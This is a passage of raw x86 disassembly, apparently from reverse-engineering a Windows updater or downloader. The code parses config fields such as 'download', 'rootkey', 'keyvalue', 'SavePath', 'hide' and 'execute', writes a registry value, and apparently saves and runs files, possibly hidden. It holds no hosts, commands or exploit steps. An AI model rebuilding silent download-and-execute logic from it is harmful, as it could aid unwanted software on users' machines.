mov byte ptr [ebp-4], 5
call sub_43162A
lea ecx, [ebp-100h]
call sub_426DB8
lea ecx, [ebp-100h]
mov byte ptr [ebp-4], 1
call sub_426ABF
loc_4235D7: ; CODE XREF: sub_42342D+E4�j
push offset aPaid ; "paid"
lea ecx, [ebp-3Ch]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-14h], 0
mov byte ptr [ebp-4], 6
jnz short loc_4235FA
push 80004003h
call sub_431952
loc_4235FA: ; CODE XREF: sub_42342D+1C1�j
mov ecx, [ebp-14h]
lea eax, [ebp-94h]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-94h]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-3Ch]
mov byte ptr [ebp-4], 1
call sub_42414A
test bl, bl
jz loc_4236F8
cmp dword ptr [ebp-14h], 0
jnz short loc_423648
push 80004003h
call sub_431952
loc_423648: ; CODE XREF: sub_42342D+20F�j
mov ecx, [ebp-14h]
lea eax, [ebp-0C4h]
push eax
call sub_4243EF
mov ecx, [eax]
mov byte ptr [ebp-4], 7
test ecx, ecx
jz short loc_423668
call sub_4241E8
jmp short loc_42366A
; ---------------------------------------------------------------------------
loc_423668: ; CODE XREF: sub_42342D+232�j
xor eax, eax
loc_42366A: ; CODE XREF: sub_42342D+239�j
push eax
lea eax, [ebp-2140h]
push edi
push eax
call dword_4331E0 ; sprintf
add esp, 0Ch
lea ecx, [ebp-0C4h]
mov byte ptr [ebp-4], 1
call sub_42414A
push 80000000h
push 1
push ecx
mov ecx, esp
mov [ebp-20h], esp
push offset byte_439CA0
call sub_43162A
push ecx
mov byte ptr [ebp-4], 8
mov ecx, esp
mov [ebp-0C8h], esp
push offset aWrP ; "WR\\p"
call sub_43162A
lea ecx, [ebp-140h]
mov byte ptr [ebp-4], 1
call sub_42692B
push ecx
lea eax, [ebp-2140h]
mov ecx, esp
mov [ebp-20h], esp
push eax
mov byte ptr [ebp-4], 9
call sub_43162A
lea ecx, [ebp-140h]
call sub_426DB8
lea ecx, [ebp-140h]
mov byte ptr [ebp-4], 1
call sub_426ABF
loc_4236F8: ; CODE XREF: sub_42342D+205�j
push offset aNextupdate ; "nextupdate"
lea ecx, [ebp-9Ch]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-14h], 0
mov byte ptr [ebp-4], 0Ah
jnz short loc_42371E
push 80004003h
call sub_431952
loc_42371E: ; CODE XREF: sub_42342D+2E5�j
mov ecx, [ebp-14h]
lea eax, [ebp-44h]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-44h]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-9Ch]
mov byte ptr [ebp-4], 1
call sub_42414A
test bl, bl
jz loc_423809
cmp dword ptr [ebp-14h], 0
jnz short loc_423769
push 80004003h
call sub_431952
loc_423769: ; CODE XREF: sub_42342D+330�j
mov ecx, [ebp-14h]
lea eax, [ebp-4Ch]
push eax
call sub_4243EF
mov ecx, [eax]
mov byte ptr [ebp-4], 0Bh
test ecx, ecx
jz short loc_423786
call sub_4241E8
jmp short loc_423788
; ---------------------------------------------------------------------------
loc_423786: ; CODE XREF: sub_42342D+350�j
xor eax, eax
loc_423788: ; CODE XREF: sub_42342D+357�j
push eax
lea eax, [ebp-2140h]
push edi
push eax
call dword_4331E0 ; sprintf
add esp, 0Ch
lea ecx, [ebp-4Ch]
mov byte ptr [ebp-4], 1
call sub_42414A
lea eax, [ebp-2140h]
push eax
call dword_4331A0 ; atol
mov esi, eax
lea eax, [ebp-1Ch]
push eax
call dword_4331A4 ; time
pop ecx
add [ebp-1Ch], esi
pop ecx
push 80000000h
push 1
push 0
push ecx
mov ecx, esp
mov [ebp-20h], esp
push offset aWrNextupdate ; "WR\\nextupdate"
call sub_43162A
lea ecx, [ebp-120h]
call sub_426584
push dword ptr [ebp-1Ch]
lea ecx, [ebp-120h]
mov byte ptr [ebp-4], 0Ch
call sub_426843
lea ecx, [ebp-120h]
mov byte ptr [ebp-4], 1
call sub_4266D6
loc_423809: ; CODE XREF: sub_42342D+326�j
push offset aDownload ; "download"
lea ecx, [ebp-54h]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-14h], 0
mov byte ptr [ebp-4], 0Dh
jnz short loc_42382C
push 80004003h
call sub_431952
loc_42382C: ; CODE XREF: sub_42342D+3F3�j
mov ecx, [ebp-14h]
lea eax, [ebp-0DCh]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-0DCh]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-54h]
mov byte ptr [ebp-4], 1
call sub_42414A
test bl, bl
jz loc_4240A0
cmp dword ptr [ebp-14h], 0
jnz short loc_42387A
push 80004003h
call sub_431952
loc_42387A: ; CODE XREF: sub_42342D+441�j
mov ecx, [ebp-14h]
lea eax, [ebp-18h]
push eax
call sub_42438B
mov eax, [ebp-24h]
mov ecx, [ebp+0Ch]
imul eax, 1400Ch
mov byte ptr [ebp-4], 0Eh
mov ebx, 80004003h
lea edi, [eax+ecx+0A000h]
loc_4238A2: ; CODE XREF: sub_42342D+C5D�j
push 0
lea ecx, [ebp-18h]
call sub_4264DA
test al, al
jnz loc_42408F
cmp dword ptr [ebp-18h], 0
jnz short loc_4238C0
push ebx
call sub_431952
loc_4238C0: ; CODE XREF: sub_42342D+48B�j
mov ecx, [ebp-18h]
lea eax, [ebp-10h]
push eax
call sub_42438B
mov byte ptr [ebp-4], 0Fh
loc_4238D0: ; CODE XREF: sub_42342D+BDE�j
push 0
lea ecx, [ebp-10h]
call sub_4264DA
test al, al
jnz loc_424010
cmp dword ptr [ebp-10h], 0
jnz short loc_4238EE
push ebx
call sub_431952
loc_4238EE: ; CODE XREF: sub_42342D+4B9�j
mov ecx, [ebp-10h]
lea eax, [ebp-0A4h]
push eax
call sub_4243EF
mov ecx, [eax]
mov byte ptr [ebp-4], 10h
test ecx, ecx
jz short loc_42390E
call sub_4241E8
jmp short loc_423910
; ---------------------------------------------------------------------------
loc_42390E: ; CODE XREF: sub_42342D+4D8�j
xor eax, eax
loc_423910: ; CODE XREF: sub_42342D+4DF�j
push eax
lea eax, [ebp-2140h]
push offset aS ; "%s"
push eax
call dword_4331E0 ; sprintf
add esp, 0Ch
lea ecx, [ebp-0A4h]
mov byte ptr [ebp-4], 0Fh
call sub_42414A
push offset aRootkey ; "rootkey"
lea ecx, [ebp-0CCh]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 11h
jnz short loc_423957
push ebx
call sub_431952
loc_423957: ; CODE XREF: sub_42342D+522�j
mov ecx, [ebp-10h]
lea eax, [ebp-5Ch]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-5Ch]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-0CCh]
mov byte ptr [ebp-4], 0Fh
call sub_42414A
test bl, bl
jz short loc_4239A2
lea eax, [ebp-2140h]
push eax
lea eax, [edi-2000h]
push eax
call dword_4330CC ; lstrcpyA
loc_4239A2: ; CODE XREF: sub_42342D+55F�j
push offset aKey ; "key"
lea ecx, [ebp-0ACh]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 12h
jnz short loc_4239C8
push 80004003h
call sub_431952
loc_4239C8: ; CODE XREF: sub_42342D+58F�j
mov ecx, [ebp-10h]
lea eax, [ebp-64h]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-64h]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-0ACh]
mov byte ptr [ebp-4], 0Fh
call sub_42414A
test bl, bl
jz short loc_423A0D
lea eax, [ebp-2140h]
push eax
push edi
call dword_4330CC ; lstrcpyA
loc_423A0D: ; CODE XREF: sub_42342D+5D0�j
push offset aKeyvalue ; "keyvalue"
lea ecx, [ebp-0D8h]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 13h
jnz short loc_423A33
push 80004003h
call sub_431952
loc_423A33: ; CODE XREF: sub_42342D+5FA�j
mov ecx, [ebp-10h]
lea eax, [ebp-6Ch]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-6Ch]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-0D8h]
mov byte ptr [ebp-4], 0Fh
call sub_42414A
test bl, bl
jz short loc_423A7E
lea eax, [ebp-2140h]
push eax
lea eax, [edi+2000h]
push eax
call dword_4330CC ; lstrcpyA
loc_423A7E: ; CODE XREF: sub_42342D+63B�j
push offset aRequiredfile ; "requiredfile"
lea ecx, [ebp-0B4h]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 14h
jnz short loc_423AA4
push 80004003h
call sub_431952
loc_423AA4: ; CODE XREF: sub_42342D+66B�j
mov ecx, [ebp-10h]
lea eax, [ebp-74h]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-74h]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-0B4h]
mov byte ptr [ebp-4], 0Fh
call sub_42414A
test bl, bl
jz short loc_423AEF
lea eax, [ebp-2140h]
push eax
lea eax, [edi+4000h]
push eax
call dword_4330CC ; lstrcpyA
loc_423AEF: ; CODE XREF: sub_42342D+6AC�j
push offset aFilename ; "filename"
lea ecx, [ebp-0D4h]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 15h
jnz short loc_423B15
push 80004003h
call sub_431952
loc_423B15: ; CODE XREF: sub_42342D+6DC�j
mov ecx, [ebp-10h]
lea eax, [ebp-7Ch]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-7Ch]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-0D4h]
mov byte ptr [ebp-4], 0Fh
call sub_42414A
test bl, bl
jz short loc_423B60
lea eax, [ebp-2140h]
push eax
lea eax, [edi-0A000h]
push eax
call dword_4330CC ; lstrcpyA
loc_423B60: ; CODE XREF: sub_42342D+71D�j
push offset aParameters ; "parameters"
lea ecx, [ebp-0BCh]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 16h
jnz short loc_423B86
push 80004003h
call sub_431952
loc_423B86: ; CODE XREF: sub_42342D+74D�j
mov ecx, [ebp-10h]
lea eax, [ebp-30h]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-30h]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-0BCh]
mov byte ptr [ebp-4], 0Fh
call sub_42414A
test bl, bl
jz short loc_423BD1
lea eax, [ebp-2140h]
push eax
lea eax, [edi-8000h]
push eax
call dword_4330CC ; lstrcpyA
loc_423BD1: ; CODE XREF: sub_42342D+78E�j
push offset aSaveas ; "SaveAs"
lea ecx, [ebp-0E0h]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 17h
jnz short loc_423BF7
push 80004003h
call sub_431952
loc_423BF7: ; CODE XREF: sub_42342D+7BE�j
mov ecx, [ebp-10h]
lea eax, [ebp-8Ch]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-8Ch]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-0E0h]
mov byte ptr [ebp-4], 0Fh
call sub_42414A
test bl, bl
jz short loc_423C48
lea eax, [ebp-2140h]
push eax
lea eax, [edi-6000h]
push eax
call dword_4330CC ; lstrcpyA
loc_423C48: ; CODE XREF: sub_42342D+805�j
push offset aSavepath ; "SavePath"
lea ecx, [ebp-38h]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 18h
jnz short loc_423C6B
push 80004003h
call sub_431952
loc_423C6B: ; CODE XREF: sub_42342D+832�j
mov ecx, [ebp-10h]
lea eax, [ebp-34h]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-34h]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-38h]
mov byte ptr [ebp-4], 0Fh
call sub_42414A
test bl, bl
jz short loc_423CB3
lea eax, [ebp-2140h]
push eax
lea eax, [edi-4000h]
push eax
call dword_4330CC ; lstrcpyA
loc_423CB3: ; CODE XREF: sub_42342D+870�j
push offset aHide ; "hide"
lea ecx, [ebp-48h]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 19h
jnz short loc_423CD6
push 80004003h
call sub_431952
loc_423CD6: ; CODE XREF: sub_42342D+89D�j
mov ecx, [ebp-10h]
lea eax, [ebp-40h]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-40h]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-48h]
mov byte ptr [ebp-4], 0Fh
call sub_42414A
test bl, bl
jz short loc_423D23
cmp byte ptr [ebp-2140h], 30h
jnz short loc_423D1C
and byte ptr [edi+0A001h], 0
jmp short loc_423D23
; ---------------------------------------------------------------------------
loc_423D1C: ; CODE XREF: sub_42342D+8E4�j
mov byte ptr [edi+0A001h], 1
loc_423D23: ; CODE XREF: sub_42342D+8DB�j
; sub_42342D+8ED�j
push offset aExecute ; "execute"
lea ecx, [ebp-58h]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1Ah
jnz short loc_423D46
push 80004003h
call sub_431952
loc_423D46: ; CODE XREF: sub_42342D+90D�j
mov ecx, [ebp-10h]
lea eax, [ebp-50h]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-50h]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-58h]
mov byte ptr [ebp-4], 0Fh
call sub_42414A
test bl, bl
jz short loc_423D93
cmp byte ptr [ebp-2140h], 30h
jnz short loc_423D8C
and byte ptr [edi+0A002h], 0
jmp short loc_423D93
; ---------------------------------------------------------------------------
loc_423D8C: ; CODE XREF: sub_42342D+954�j
mov byte ptr [edi+0A002h], 1
loc_423D93: ; CODE XREF: sub_42342D+94B�j
; sub_42342D+95D�j
push offset aWait ; "wait"
lea ecx, [ebp-68h]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1Bh
jnz short loc_423DB6
push 80004003h
call sub_431952
loc_423DB6: ; CODE XREF: sub_42342D+97D�j
mov ecx, [ebp-10h]
lea eax, [ebp-60h]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-60h]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-68h]
mov byte ptr [ebp-4], 0Fh
call sub_42414A
test bl, bl
jz short loc_423E03
cmp byte ptr [ebp-2140h], 30h
jnz short loc_423DFC
and byte ptr [edi+0A004h], 0
jmp short loc_423E03
; ---------------------------------------------------------------------------
loc_423DFC: ; CODE XREF: sub_42342D+9C4�j
mov byte ptr [edi+0A004h], 1
loc_423E03: ; CODE XREF: sub_42342D+9BB�j
; sub_42342D+9CD�j
push offset aNewupdater ; "newupdater"
lea ecx, [ebp-78h]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1Ch
jnz short loc_423E26
push 80004003h
call sub_431952
loc_423E26: ; CODE XREF: sub_42342D+9ED�j
mov ecx, [ebp-10h]
lea eax, [ebp-70h]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-70h]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-78h]
mov byte ptr [ebp-4], 0Fh
call sub_42414A
test bl, bl
jz short loc_423E73
cmp byte ptr [ebp-2140h], 30h
jnz short loc_423E6C
and byte ptr [edi+0A000h], 0
jmp short loc_423E73
; ---------------------------------------------------------------------------
loc_423E6C: ; CODE XREF: sub_42342D+A34�j
mov byte ptr [edi+0A000h], 1
loc_423E73: ; CODE XREF: sub_42342D+A2B�j
; sub_42342D+A3D�j
push offset aVersion_0 ; "version"
lea ecx, [ebp-88h]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1Dh
jnz short loc_423E99
push 80004003h
call sub_431952
loc_423E99: ; CODE XREF: sub_42342D+A60�j
mov ecx, [ebp-10h]
lea eax, [ebp-80h]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-80h]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-88h]
mov byte ptr [ebp-4], 0Fh
call sub_42414A
test bl, bl
jz short loc_423EE4
lea eax, [ebp-2140h]
push eax
lea eax, [edi+6000h]
push eax
call dword_4330CC ; lstrcpyA
loc_423EE4: ; CODE XREF: sub_42342D+AA1�j
push offset aIdentifier ; "identifier"
lea ecx, [ebp-98h]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1Eh
jnz short loc_423F0A
push 80004003h
call sub_431952
loc_423F0A: ; CODE XREF: sub_42342D+AD1�j
mov ecx, [ebp-10h]
lea eax, [ebp-90h]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-90h]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-98h]
mov byte ptr [ebp-4], 0Fh
call sub_42414A
test bl, bl
jz short loc_423F5B
lea eax, [ebp-2140h]
push eax
lea eax, [edi+8000h]
push eax
call dword_4330CC ; lstrcpyA
loc_423F5B: ; CODE XREF: sub_42342D+B18�j
push offset aCrc ; "crc"
lea ecx, [ebp-0A8h]
call sub_4240F6
mov esi, eax
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1Fh
jnz short loc_423F81
push 80004003h
call sub_431952
loc_423F81: ; CODE XREF: sub_42342D+B48�j
mov ecx, [ebp-10h]
lea eax, [ebp-0A0h]
push eax
call sub_4242B2
push esi
mov ecx, eax
call sub_42415D
mov ebx, eax
lea ecx, [ebp-0A0h]
neg ebx
sbb bl, bl
inc bl
call sub_42414A
lea ecx, [ebp-0A8h]
mov byte ptr [ebp-4], 0Fh
call sub_42414A
test bl, bl
jz short loc_423FD2
lea eax, [ebp-2140h]
push eax
call dword_4331A8 ; atoi
pop ecx
mov [edi+0A008h], eax
loc_423FD2: ; CODE XREF: sub_42342D+B8F�j
cmp dword ptr [ebp-10h], 0
jnz short loc_423FE2
push 80004003h
call sub_431952
loc_423FE2: ; CODE XREF: sub_42342D+BA9�j
mov ecx, [ebp-10h]
lea eax, [ebp-0B0h]
push eax
call sub_4243BD
push dword ptr [eax]
lea ecx, [ebp-10h]
call sub_4264AF
lea ecx, [ebp-0B0h]
call sub_4264A2
mov ebx, 80004003h
jmp loc_4238D0
; ---------------------------------------------------------------------------
loc_424010: ; CODE XREF: sub_42342D+4AF�j
lea esi, [edi-4000h]
push 0Ah
push offset aWindows ; "windows"
push esi
call dword_4331AC ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_424045
mov eax, [ebp-28h]
push dword ptr [eax+1Ch]
push esi
call sub_431758 ; strcpy
push offset dword_43710C
push esi
call sub_431770 ; strcat
add esp, 10h
loc_424045: ; CODE XREF: sub_42342D+BFC�j
inc dword ptr [ebp-24h]
lea ecx, [ebp-10h]
add edi, 1400Ch
mov byte ptr [ebp-4], 0Eh
call sub_4264A2
cmp dword ptr [ebp-18h], 0
jnz short loc_424066
push ebx
call sub_431952
loc_424066: ; CODE XREF: sub_42342D+C31�j
mov ecx, [ebp-18h]
lea eax, [ebp-0B8h]
push eax
call sub_4243BD
push dword ptr [eax]
lea ecx, [ebp-18h]
call sub_4264AF
lea ecx, [ebp-0B8h]
call sub_4264A2
jmp loc_4238A2
; ---------------------------------------------------------------------------
loc_42408F: ; CODE XREF: sub_42342D+481�j
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 1
call sub_4264A2
mov edi, offset aS ; "%s"
loc_4240A0: ; CODE XREF: sub_42342D+437�j
cmp dword ptr [ebp-14h], 0
jnz short loc_4240B0
push 80004003h
call sub_431952
loc_4240B0: ; CODE XREF: sub_42342D+C77�j
mov ecx, [ebp-14h]
lea eax, [ebp-2Ch]
push eax
call sub_4243BD
push dword ptr [eax]
lea ecx, [ebp-14h]
call sub_4264AF
lea ecx, [ebp-2Ch]
call sub_4264A2
xor ebx, ebx
jmp loc_4234A0
; ---------------------------------------------------------------------------
loc_4240D5: ; CODE XREF: sub_42342D+7E�j
lea ecx, [ebp-14h]
call sub_4264A2
lea ecx, [ebp+8]
call sub_4264A2
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 8
sub_42342D endp
; =============== S U B R O U T I N E =======================================
sub_4240F6 proc near ; CODE XREF: sub_42342D+8F�p
; sub_42342D+1B2�p ...
mov eax, offset loc_431F52
call sub_43176A ; _EH_prolog
push ecx
push esi
mov esi, ecx
push 0Ch
call sub_431624
pop ecx
mov ecx, eax
mov [ebp-10h], ecx
and dword ptr [ebp-4], 0
test ecx, ecx
jz short loc_424123
push dword ptr [ebp+8]
call sub_424188
jmp short loc_424125
; ---------------------------------------------------------------------------
loc_424123: ; CODE XREF: sub_4240F6+21�j
xor eax, eax
loc_424125: ; CODE XREF: sub_4240F6+2B�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov [esi], eax
test eax, eax
jnz short loc_424139
push 8007000Eh
call sub_431952
loc_424139: ; CODE XREF: sub_4240F6+37�j
mov ecx, [ebp-0Ch]
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_4240F6 endp
; =============== S U B R O U T I N E =======================================
sub_42414A proc near ; CODE XREF: sub_42342D+CE�p
; sub_42342D+DD�p ...
push esi
mov esi, ecx
mov ecx, [esi]
test ecx, ecx
jz short loc_42415B
call sub_4241BB
and dword ptr [esi], 0
loc_42415B: ; CODE XREF: sub_42414A+7�j
pop esi
retn
sub_42414A endp
; =============== S U B R O U T I N E =======================================
sub_42415D proc near ; CODE XREF: sub_42342D+BB�p
; sub_42342D+1DF�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, [ecx]
mov eax, [eax]
cmp ecx, eax
jnz short loc_42416D
xor eax, eax
jmp short locret_424185
; ---------------------------------------------------------------------------
loc_42416D: ; CODE XREF: sub_42415D+A�j
test ecx, ecx
jnz short loc_424176
or eax, 0FFFFFFFFh
jmp short locret_424185
; ---------------------------------------------------------------------------
loc_424176: ; CODE XREF: sub_42415D+12�j
test eax, eax
jnz short loc_42417F
push 1
pop eax
jmp short locret_424185
; ---------------------------------------------------------------------------
loc_42417F: ; CODE XREF: sub_42415D+1B�j
push eax
call sub_424212
locret_424185: ; CODE XREF: sub_42415D+E�j
; sub_42415D+17�j ...
retn 4
sub_42415D endp
; =============== S U B R O U T I N E =======================================
sub_424188 proc near ; CODE XREF: sub_4240F6+26�p
; sub_429980+47�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
and dword ptr [esi+4], 0
mov dword ptr [esi+8], 1
call sub_4319FF
test eax, eax
mov [esi], eax
jnz short loc_4241B5
cmp [esp+4+arg_0], eax
jz short loc_4241B5
push 8007000Eh
call sub_431952
loc_4241B5: ; CODE XREF: sub_424188+1B�j
; sub_424188+21�j
mov eax, esi
pop esi
retn 4
sub_424188 endp
; =============== S U B R O U T I N E =======================================
sub_4241BB proc near ; CODE XREF: sub_42414A+9�p
push esi
mov esi, ecx
push edi
lea edi, [esi+8]
push edi
call dword_4330C4 ; InterlockedDecrement
test eax, eax
jnz short loc_4241E3
test esi, esi
jz short loc_4241DF
mov ecx, esi
call sub_424292
push esi
call sub_43161E
pop ecx
loc_4241DF: ; CODE XREF: sub_4241BB+14�j
xor eax, eax
jmp short loc_4241E5
; ---------------------------------------------------------------------------
loc_4241E3: ; CODE XREF: sub_4241BB+10�j
mov eax, [edi]
loc_4241E5: ; CODE XREF: sub_4241BB+26�j
pop edi
pop esi
retn
sub_4241BB endp
; =============== S U B R O U T I N E =======================================
sub_4241E8 proc near ; CODE XREF: sub_42342D+113�p
; sub_42342D+234�p ...
push esi
mov esi, ecx
cmp dword ptr [esi+4], 0
jnz short loc_42420D
push dword ptr [esi]
call sub_431A74
test eax, eax
mov [esi+4], eax
jnz short loc_42420D
cmp [esi], eax
jz short loc_42420D
push 8007000Eh
call sub_431952
loc_42420D: ; CODE XREF: sub_4241E8+7�j
; sub_4241E8+15�j ...
mov eax, [esi+4]
pop esi
retn
sub_4241E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424212 proc near ; CODE XREF: sub_42415D+23�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ebx, ecx
push esi
push edi
mov eax, [ebx]
test eax, eax
jnz short loc_42422B
mov eax, [ebp+arg_0]
mov eax, [eax]
neg eax
sbb eax, eax
jmp short loc_42428B
; ---------------------------------------------------------------------------
loc_42422B: ; CODE XREF: sub_424212+C�j
mov edi, [ebp+arg_0]
cmp dword ptr [edi], 0
jnz short loc_424238
push 1
pop eax
jmp short loc_42428B
; ---------------------------------------------------------------------------
loc_424238: ; CODE XREF: sub_424212+1F�j
mov esi, dword_433278
push eax
call esi
push dword ptr [edi]
mov [ebp+arg_0], eax
call esi
mov edx, [ebp+arg_0]
cmp edx, eax
jbe short loc_424251
mov edx, eax
loc_424251: ; CODE XREF: sub_424212+3B�j
mov ecx, [ebx]
mov edi, [edi]
loc_424255: ; CODE XREF: sub_424212+57�j
mov esi, edx
dec edx
test esi, esi
jbe short loc_424277
mov bx, [edi]
mov si, [ecx]
inc edi
inc edi
inc ecx
inc ecx
cmp si, bx
jz short loc_424255
movzx edx, word ptr [edi-2]
movzx eax, word ptr [ecx-2]
sub eax, edx
jmp short loc_42428B
; ---------------------------------------------------------------------------
loc_424277: ; CODE XREF: sub_424212+48�j
cmp [ebp+arg_0], eax
jnb short loc_424281
or eax, 0FFFFFFFFh
jmp short loc_42428B
; ---------------------------------------------------------------------------
loc_424281: ; CODE XREF: sub_424212+68�j
xor ecx, ecx
cmp [ebp+arg_0], eax
setnz cl
mov eax, ecx
loc_42428B: ; CODE XREF: sub_424212+17�j
; sub_424212+24�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 4
sub_424212 endp
; =============== S U B R O U T I N E =======================================
sub_424292 proc near ; CODE XREF: sub_4241BB+18�p
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_4242A2
push eax
call dword_433274
loc_4242A2: ; CODE XREF: sub_424292+7�j
mov esi, [esi+4]
test esi, esi
jz short loc_4242B0
push esi
call sub_43161E
pop ecx
loc_4242B0: ; CODE XREF: sub_424292+15�j
pop esi
retn
sub_424292 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4242B2 proc near ; CODE XREF: sub_42342D+B3�p
; sub_42342D+1D7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
mov esi, ecx
lea ecx, [ebp+var_4]
mov eax, [esi]
push ecx
push esi
call dword ptr [eax+1Ch]
test eax, eax
jge short loc_4242D7
push offset dword_437218
push esi
push eax
call sub_431960
loc_4242D7: ; CODE XREF: sub_4242B2+17�j
mov ecx, [ebp+arg_0]
push 0
push [ebp+var_4]
call sub_4242EC
mov eax, [ebp+arg_0]
pop esi
leave
retn 4
sub_4242B2 endp
; =============== S U B R O U T I N E =======================================
sub_4242EC proc near ; CODE XREF: sub_4242B2+2D�p
; sub_4243EF+2D�p
mov eax, offset loc_431F66
call sub_43176A ; _EH_prolog
push ecx
push esi
mov esi, ecx
push 0Ch
call sub_431624
pop ecx
mov ecx, eax
mov [ebp-10h], ecx
and dword ptr [ebp-4], 0
test ecx, ecx
jz short loc_42431C
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_424343
jmp short loc_42431E
; ---------------------------------------------------------------------------
loc_42431C: ; CODE XREF: sub_4242EC+21�j
xor eax, eax
loc_42431E: ; CODE XREF: sub_4242EC+2E�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov [esi], eax
test eax, eax
jnz short loc_424332
push 8007000Eh
call sub_431952
loc_424332: ; CODE XREF: sub_4242EC+3A�j
mov ecx, [ebp-0Ch]
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 8
sub_4242EC endp
; =============== S U B R O U T I N E =======================================
sub_424343 proc near ; CODE XREF: sub_4242EC+29�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
mov esi, ecx
push edi
mov edi, [esp+8+arg_0]
and dword ptr [esi+4], 0
cmp [esp+8+arg_4], 0
mov dword ptr [esi+8], 1
jz short loc_424382
test edi, edi
jz short loc_424382
push edi
call dword_43326C
push eax
push edi
call dword_433270
test eax, eax
mov [esi], eax
jnz short loc_424384
push 8007000Eh
call sub_431952
jmp short loc_424384
; ---------------------------------------------------------------------------
